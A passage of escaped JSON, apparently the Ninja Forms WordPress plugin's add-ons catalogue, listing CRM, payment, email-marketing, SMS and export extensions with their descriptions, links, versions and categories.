2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Insightly CRM\",\"image\":\"assets\\/img\\/add-ons\\/insightly-crm.png\",\"content\":\"Your customer\'s journey begins with your WordPress forms. Send Contacts, Leads, Opportunities, Custom fields and more seamlessly from WordPress to Insightly!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/insightly-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Insightly+CRM\",\"plugin\":\"ninja-forms-insightly-crm\\/ninja-forms-insightly-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/insightly-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Insightly+CRM+Docs\",\"version\":\"3.2.1\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Trello\",\"image\":\"assets\\/img\\/add-ons\\/trello.png\",\"content\":\"Create a new Trello card with data from any WordPress form submission. Map fields to card details, assign members and labels, upload images, embed links.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/trello\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Trello\",\"plugin\":\"ninja-forms-trello\\/ninja-forms-trello.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/trello\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Trello+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"}]},{\"title\":\"Elavon\",\"image\":\"assets\\/img\\/add-ons\\/elavon.png\",\"content\":\"Accept credit card payments from any of your WordPress forms. Pass customer and invoice info from any field securely into Elavon with each payment.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/elavon\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elavon\",\"plugin\":\"ninja-forms-elavon-payment-gateway\\/ninja-forms-elavon-payment-gateway.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/elavon\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elavon+Docs\",\"version\":\"3.1.1\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Zapier\",\"image\":\"assets\\/img\\/add-ons\\/zapier.png\",\"content\":\"Don\'t see an add-on integration for a service you love? Don\'t worry! Connect WordPress to more than 4,000 different services through Zapier, no code required!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/zapier\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zapier\",\"plugin\":\"ninja-forms-zapier\\/ninja-forms-zapier.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/zapier\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Zapier+Docs\",\"version\":\"3.0.8\",\"categories\":[{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Custom Integrations\",\"slug\":\"custom-integrations\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"}]},{\"title\":\"Salesforce CRM\",\"image\":\"assets\\/img\\/add-ons\\/salesforce-crm.png\",\"content\":\"Easily map any form field to any Salesforce Object or Field. A better connection to your customers begins with a better WordPress form builder!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/salesforce-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Salesforce+CRM\",\"plugin\":\"ninja-forms-salesforce-crm\\/ninja-forms-salesforce-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/salesforce-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Salesforce+CRM+Docs\",\"version\":\"3.3.2\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Slack\",\"image\":\"assets\\/img\\/add-ons\\/slack.png\",\"content\":\"Get realtime Slack notifications in the workspace and channel of your choice with any new WordPress form submission. @Mention any team member!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/slack\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Slack\",\"plugin\":\"ninja-forms-slack\\/ninja-forms-slack.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/slack\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Slack+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Notifications\",\"slug\":\"notifications\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"}]},{\"title\":\"CleverReach\",\"image\":\"assets\\/img\\/add-ons\\/cleverreach.png\",\"content\":\"Grow the reach of your email marketing with better CleverReach signup forms. Tailor your forms to your audience with this easy to set up integration!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/cleverreach\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CleverReach\",\"plugin\":\"ninja-forms-cleverreach\\/ninja-forms-cleverreach.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/cleverreach\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CleverReach+Docs\",\"version\":\"3.1.5\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Webhooks\",\"image\":\"assets\\/img\\/add-ons\\/webhooks.png\",\"content\":\"Can\'t find a WordPress integration for the service you love? Send WordPress forms data to any external URL using a simple GET or POST request!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/webhooks\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Webhooks\",\"plugin\":\"ninja-forms-webhooks\\/ninja-forms-webhooks.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/webhooks\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Webhooks+Docs\",\"version\":\"3.0.5\",\"categories\":[{\"name\":\"Notifications\",\"slug\":\"notifications\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Custom Integrations\",\"slug\":\"custom-integrations\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Excel Export\",\"image\":\"assets\\/img\\/add-ons\\/excel-export.png\",\"content\":\"Export any form\'s submissions as a Microsoft Excel spreadsheet. Choose a date range, the fields you want to include, and export to Excel! \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/excel-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Excel+Export\",\"plugin\":\"ninja-forms-excel-export\\/ninja-forms-excel-export.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/excel-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Excel+Export+Docs\",\"version\":\"3.3.4\",\"categories\":[{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"}]},{\"title\":\"Formstack Documents\",\"image\":\"assets\\/img\\/add-ons\\/webmerge.png\",\"content\":\"Create specifically formatted templates from an uploaded PDF or Word document, then auto-fill them from any WordPress form submission!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/webmerge\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Formstack+Documents\",\"plugin\":\"ninja-forms-webmerge\\/ninja-forms-webmerge.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/webmerge\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Formstack+Documents+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Help Scout\",\"image\":\"assets\\/img\\/add-ons\\/help-scout.png\",\"content\":\"Offering great support is hard. Tailor your WordPress forms to match your customers\' needs with this Help Scout integration for WordPress.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/help-scout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Help+Scout\",\"plugin\":null,\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/help-scout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Help+Scout+Docs\",\"version\":\"3.1.3\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Emma\",\"image\":\"assets\\/img\\/add-ons\\/emma.png\",\"content\":\"Take your email marketing further with handcrafted, easy to build signup forms that connect directly into your Emma account! \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/emma\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Emma\",\"plugin\":\"ninja-forms-emma\\/ninja-forms-emma.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/emma\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Emma+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"ClickSend SMS\",\"image\":\"assets\\/img\\/add-ons\\/clicksend-sms.png\",\"content\":\"Get instant SMS notifications with every new WordPress form submission. Respond to leads faster and make more personal connections!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/clicksend-sms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ClickSend+SMS\",\"plugin\":\"ninja-forms-clicksend\\/ninja-forms-clicksend.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/clicksend-sms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ClickSend+SMS+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"SMS Notifications\",\"slug\":\"sms-notifications\"}]},{\"title\":\"Twilio SMS\",\"image\":\"assets\\/img\\/add-ons\\/twilio-sms.png\",\"content\":\"Get instant SMS notifications with every new WordPress form submission. Respond to leads faster and make more personal connections!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/twilio\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Twilio+SMS\",\"plugin\":\"ninja-forms-twilio\\/ninja-forms-twilio.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/twilio\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Twilio+SMS+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"SMS Notifications\",\"slug\":\"sms-notifications\"}]},{\"title\":\"Recurly\",\"image\":\"assets\\/img\\/add-ons\\/recurly.png\",\"content\":\"Subscription plans a part of your business model? Let your users subscribe from any WordPress form & make management easier with Recurly!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/recurly\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Recurly\",\"plugin\":\"ninja-forms-recurly\\/ninja-forms-recurly.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/recurly\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Recurly+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Save Progress\",\"image\":\"assets\\/img\\/add-ons\\/save-progress.png\",\"content\":\"Let your users save their work and reload it all when they have time to return. Don\'t lose out on valuable submissions for longer forms!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/save-progress\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Save+Progress\",\"plugin\":\"ninja-forms-save-progress\\/ninja-forms-save-progress.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/save-progress\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Save+Progress+Docs\",\"version\":\"3.0.25\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"EmailOctopus\",\"image\":\"assets\\/img\\/add-ons\\/emailoctopus.png\",\"content\":\"Pair WordPress\' best drag and drop form builder with your EmailOctopus account for incredibly effective signup forms. Easy, complete integration.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/emailoctopus\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=EmailOctopus\",\"plugin\":\"ninja-forms-emailoctopus\\/ninja-forms-emailoctopus.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/emailoctopus\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=EmailOctopus+Docs\",\"version\":\"3.0.0\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Pipeline CRM\",\"image\":\"assets\\/img\\/add-ons\\/pipelinedeals-crm.png\",\"content\":\"Complete, effortless integration with Pipeline CRM. Increase the flow of leads into your sales pipeline with upgraded lead generation forms!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/pipelinedeals-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pipeline+CRM\",\"plugin\":\"ninja-forms-zoho-crm\\/zoho-integration.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/pipelinedeals-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pipeline+CRM+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"ConvertKit\",\"image\":\"assets\\/img\\/add-ons\\/convertkit.png\",\"content\":\"Connect WordPress to your ConvertKit account with completely customizable opt-in forms. Watch your audience & sales grow like never before!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/convertkit\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ConvertKit\",\"plugin\":\"ninja-forms-convertkit\\/ninja-forms-convertkit.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/convertkit\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ConvertKit+Docs\",\"version\":\"3.1.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"OnePageCRM\",\"image\":\"assets\\/img\\/add-ons\\/onepage-crm.png\",\"content\":\"Integrate WordPress with OnePage CRM seamlessly through highly customizable WordPress forms. Make better conversions <em>your<\\/em> Next Action!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/onepage-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=OnePageCRM\",\"plugin\":\"ninja-forms-onepage-crm\\/ninja-forms-onepage-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/onepage-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=OnePageCRM+Docs\",\"version\":\"3.0.2\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"ActiveCampaign\",\"image\":\"assets\\/img\\/add-ons\\/active-campaign.png\",\"content\":\"Design custom forms that link perfectly to your ActiveCampaign account for the ultimate in marketing automation. Better leads begin here!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/activecampaign\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ActiveCampaign\",\"plugin\":\"ninja-forms-active-campaign\\/ninja-forms-active-campaign.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/activecampaign\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ActiveCampaign+Docs\",\"version\":\"3.1.2\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Agency Membership\",\"image\":\"assets\\/img\\/add-ons\\/ninja-forms-membership-bundle-2.png\",\"content\":\"Get every single Ninja Forms add-ons, at an amazingly discounted price.\",\"link\":\"https:\\/\\/ninjaforms.com\\/documentation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Agency+Membership\",\"plugin\":null,\"docs\":\"https:\\/\\/ninjaforms.com\\/documentation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Agency+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Deprecated\",\"slug\":\"deprecated\"}]},{\"title\":\"Personal Membership\",\"image\":\"assets\\/img\\/add-ons\\/individual-membership-2.png\",\"content\":\"Get our most popular add-ons at an amazingly discounted price. Perfect for the single site owner.\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Personal+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Personal+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Deprecated\",\"slug\":\"deprecated\"}]},{\"title\":\"Professional Membership\",\"image\":\"assets\\/img\\/add-ons\\/professional-membership-2.png\",\"content\":\"Get our 4 most popular add-ons at an amazingly discounted price. Perfect for your Do It Yourself business owner.\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Professional+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Professional+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Deprecated\",\"slug\":\"deprecated\"}]},{\"title\":\"Basic Membership\",\"image\":\"assets\\/img\\/add-ons\\/basic-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Basic+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Basic+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":null,\"slug\":null}]},{\"title\":\"Plus Membership\",\"image\":\"assets\\/img\\/add-ons\\/plus-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Plus+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Plus+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":null,\"slug\":null}]},{\"title\":\"Pro Membership\",\"image\":\"assets\\/img\\/add-ons\\/pro-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pro+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pro+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":null,\"slug\":null}]},{\"title\":\"Elite Membership\",\"image\":\"assets\\/img\\/add-ons\\/elite-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elite+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elite+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":null,\"slug\":null}]},{\"title\":\"Scheduled Submissions Export\",\"image\":\"assets\\/img\\/add-ons\\/scheduled-submissions-export.png\",\"content\":\"Use Scheduled Submissions Export to set hourly, daily, or weekly exports of any WordPress form submissions to any email address(es)!\",\"link\":\" https:\\/\\/ninjaforms.com\\/extensions\\/scheduled-submissions-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Scheduled+Submissions+Export\",\"plugin\":\"ninja-forms-scheduled-exports\\/ninja-forms-scheduled-exports.php\",\"docs\":\" https:\\/\\/ninjaforms.com\\/docs\\/scheduled-submissions-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Scheduled+Submissions+Export+Docs\",\"version\":\"3.0.2\",\"categories\":[{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"}]},{\"title\":\"CiviCRM\",\"image\":\"assets\\/img\\/add-ons\\/civicrm.png\",\"content\":\"Connect & update your CiviCRM account from any WordPress form with the Ninja Forms CiviCRM add-on. Easily add or update Contacts & 